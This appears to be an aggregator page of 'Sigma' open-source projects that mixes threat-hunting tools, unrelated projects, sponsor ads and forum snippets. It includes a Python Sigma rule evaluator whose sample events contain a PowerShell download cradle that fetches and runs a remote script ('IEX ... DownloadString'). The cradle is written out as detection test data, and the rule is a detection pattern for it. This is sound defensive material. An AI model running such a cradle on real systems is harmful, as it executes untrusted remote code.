Top 17 Sigma Open-Source Projects
- hayabusa: Hayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs.
- InfluxDB (sponsor): Power Real-Time Data Analytics at Scale. Get real-time insights from all types of time series data with InfluxDB. Ingest, query, and analyze billions of data points in real-time with unbounded cardinality.
- dj-stripe: dj-stripe automatically syncs your Stripe data to your local database as pre-implemented Django models, so you can work with the data through the Django ORM in your own code, which is easier and faster.
- WorkOS (sponsor): The modern identity platform for B2B SaaS. The APIs are flexible and easy-to-use, supporting authentication, user identity, and complex enterprise features like SSO and SCIM provisioning.
- SaaSHub (sponsor): Software Alternatives and Reviews. SaaSHub helps you find the best software and product alternatives.
Project mention: Agent event queue is flooded. Check the agent configuration | /r/Wazuh | 2023-06-30
Project mention: Hayabusa: Sigma-based forensics timeline generator for Windows event logs | news.ycombinator.com | 2024-04-24
If you don't want to use Pegasus or another paid product (presumably because of the cost), the packages I'd reach for are django-allauth for login/user stuff and dj-stripe for the Stripe integration. As for teams, there wasn't a library I was happy with so I rolled my own for Pegasus, but some people like django-tenants. It's too heavyweight for my taste as it requires a more complex dev/test/infrastructure setup with Postgres schemas, as opposed to having a single-database and handling multitenancy in the application layer. But there are pros and cons to both approaches.
Peter continues his work on walletdb refactoring (PR #1239), which optimizes performance by using a single instance of CWalletDB. It is about 90% done and is estimated to be done by the end of the week.
Project mention: Vector: A high-performance observability data pipeline | news.ycombinator.com | 2024-03-17
We're building something similar at Tenzir, but more for operational security workloads. https://docs.tenzir.com
Differences from Vector:
- An agent has optional indexed storage, so you can store your data there and pick it up later. The storage is based on Apache Feather, Parquet's little brother.
- Pipeline operators work with both data frames (Arrow record batches) and chunks of bytes.
- Structured pipelines are multi-schema, i.e., a single pipeline can process streams of record batches with different schemas.
Project mention: EnableWindowsLogSettings: Documentation and scripts to properly enable Windows event logs. | /r/blueteamsec | 2023-06-04
Also have an instance of S1EM - https://github.com/V1D1AN/S1EM - running, monitoring my home LAN, firewall etc. It's huge overkill, and your machine may struggle to run it if you ran anything else with it, but might be worth looking at.
I am currently employed as a cyber analyst, and we've recently implemented an Endpoint Detection and Response (EDR) system. Upon closer inspection, I've observed that numerous events are not being flagged as alerts. This raises a crucial question: should I take the initiative to create custom rules to ensure these events are brought to our attention, or should I rely solely on the EDR's intrinsic capabilities to detect and classify threats? As a potential solution, I'm contemplating the implementation of rules based on Sigma, such as those available at the following repository: here. Your insights and experiences on the effectiveness of this approach would be greatly appreciated. Thank you for your time and assistance.
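The post above asks whether to write custom Sigma rules to cover events the EDR does not alert on. To make concrete what a Sigma rule actually does when a tool such as Hayabusa or Chainsaw runs it over event logs, here is an added example that is not code from Hayabusa, Chainsaw, the Sigma project or the linked repository: a small Python evaluator for a subset of the Sigma rule format (field selections with the contains, startswith, endswith and all modifiers, and conditions built from and, or, not and parentheses), run over constructed process-creation records. The rule, the field names and the three events are constructed for the illustration; only the rule shape follows the public Sigma format.

```python
"""Minimal Sigma rule evaluator over JSON-style Windows events (added example).

Supports only a subset of the Sigma specification: field/value selections with the
``contains``, ``startswith``, ``endswith`` and ``all`` modifiers, case-insensitive
wildcard matching for plain values, and conditions made of and/or/not/parentheses.
"""
import fnmatch
import re

# Constructed rule written as a dict instead of YAML so the example has no dependency.
RULE = {
    "title": "PowerShell download cradle (illustrative, constructed rule)",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],   # list = OR
            "CommandLine|contains|all": ["DownloadString", "IEX"],  # |all = AND
        },
        "filter_admin": {  # hypothetical tuning filter for a deployment account
            "ParentImage|endswith": "\\explorer.exe",
            "User|startswith": "CORP\\svc-",
        },
        "condition": "selection and not filter_admin",
    },
    "level": "high",
}

# Constructed process_creation records using Sysmon-style field names.
EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://10.0.0.5/a.ps1')",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe", "User": "CORP\\alice"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -c Get-Process",
     "ParentImage": "C:\\Windows\\explorer.exe", "User": "CORP\\alice"},
    {"Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "CommandLine": "pwsh -c IEX (iwr http://deploy.corp/).Content; DownloadString",
     "ParentImage": "C:\\Windows\\explorer.exe", "User": "CORP\\svc-deploy"},
]


def _match_value(value, pattern, mods):
    """Sigma string matching is case-insensitive; plain values allow * and ? wildcards."""
    v, p = str(value).lower(), str(pattern).lower()
    if "contains" in mods:
        return p in v
    if "startswith" in mods:
        return v.startswith(p)
    if "endswith" in mods:
        return v.endswith(p)
    return fnmatch.fnmatchcase(v, p)  # escaping of literal * and ? is not handled here


def _match_field(event, key, patterns):
    field, *mods = key.split("|")
    if field not in event:
        return False
    patterns = patterns if isinstance(patterns, list) else [patterns]
    results = [_match_value(event[field], p, mods) for p in patterns]
    return all(results) if "all" in mods else any(results)


def match_selection(event, selection):
    """Fields inside one map are ANDed; a list of maps is ORed."""
    if isinstance(selection, list):
        return any(match_selection(event, s) for s in selection)
    return all(_match_field(event, k, v) for k, v in selection.items())


_TOKEN = re.compile(r"\(|\)|[A-Za-z_][A-Za-z0-9_]*")


def evaluate_condition(condition, event, detection):
    """Recursive-descent evaluation of 'a and not (b or c)' style conditions."""
    tokens, pos = _TOKEN.findall(condition), 0

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def take():
        nonlocal pos
        if pos >= len(tokens):
            raise ValueError("unexpected end of condition")
        pos += 1
        return tokens[pos - 1]

    def parse_or():
        left = parse_and()
        while peek() == "or":
            take()
            left = parse_and() or left
        return left

    def parse_and():
        left = parse_not()
        while peek() == "and":
            take()
            left = parse_not() and left
        return left

    def parse_not():
        if peek() == "not":
            take()
            return not parse_not()
        tok = take()
        if tok == "(":
            val = parse_or()
            if take() != ")":
                raise ValueError("missing closing parenthesis")
            return val
        if tok == "condition" or tok not in detection:
            raise ValueError(f"unknown identifier {tok!r}")
        return match_selection(event, detection[tok])

    result = parse_or()
    if pos != len(tokens):
        raise ValueError("trailing tokens in condition")
    return result


def rule_matches(rule, event):
    det = rule["detection"]
    return evaluate_condition(det["condition"], event, det)


def scan(rule, events):
    """Return the indices of the events the rule fires on."""
    return [i for i, e in enumerate(events) if rule_matches(rule, e)]


if __name__ == "__main__":
    print(scan(RULE, EVENTS))  # [0]: only the cmd.exe-spawned cradle survives the filter
```

Only the first event fires: the second lacks the download cradle, and the third is suppressed by the filter because it was launched from explorer.exe by a CORP\svc- account. That filter is also where custom rules go wrong in practice: a tuning exception written for one noisy account silently blinds the rule to anything run as that account, so every filter should be as narrow as the benign behaviour it exempts. Real Sigma backends additionally handle value escaping, the `re` modifier, `1 of selection*` quantifiers, aggregations and per-log-source field mapping, so rules meant for production should be converted with pySigma or sigma-cli rather than a hand-written matcher like this one.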
Sigma related posts
- should we write our own custom rule
- Chainsaw for Linux
- Webapp for converting sigma detection rules into SIEM queries
- A tool to detect errors early and measure the Effectiveness of SIEM rules against the behaviors that the rule was developed to work against, ensuring that the whole process of data collection, parsing, and query of security data is working properly and alert when things don't work as intended
- The Ultimate Sigma Starter-Kit
- Up your grindset with a true sigma serverless API, made with Next.js
- Up your grindset with a true sigma serverless API
A note from our sponsor - WorkOS
workos.com | 27 Apr 2024
Index
What are some of the best open-source Sigma projects? This list will help you:
| # | Project | Stars |
|---|---------|-------|
| 1 | chainsaw | 2,547 |
| 2 | hayabusa | 1,922 |
| 3 | dj-stripe | 1,544 |
| 4 | firo | 704 |
| 5 | WELA | 651 |
| 6 | tenzir | 611 |
| 7 | Zircolite | 596 |
| 8 | EnableWindowsLogSettings | 442 |
| 9 | S1EM | 387 |
| 10 | SIGMA-detection-rules | 265 |
| 11 | hayabusa-rules | 108 |
| 12 | sysmon | 55 |
| 13 | Automata | 48 |
| 14 | automathon | 47 |
| 15 | sigma-male-grindset-api | 18 |
| 16 | sigma-convert | 6 |
| 17 | sigma-essentials | 0 |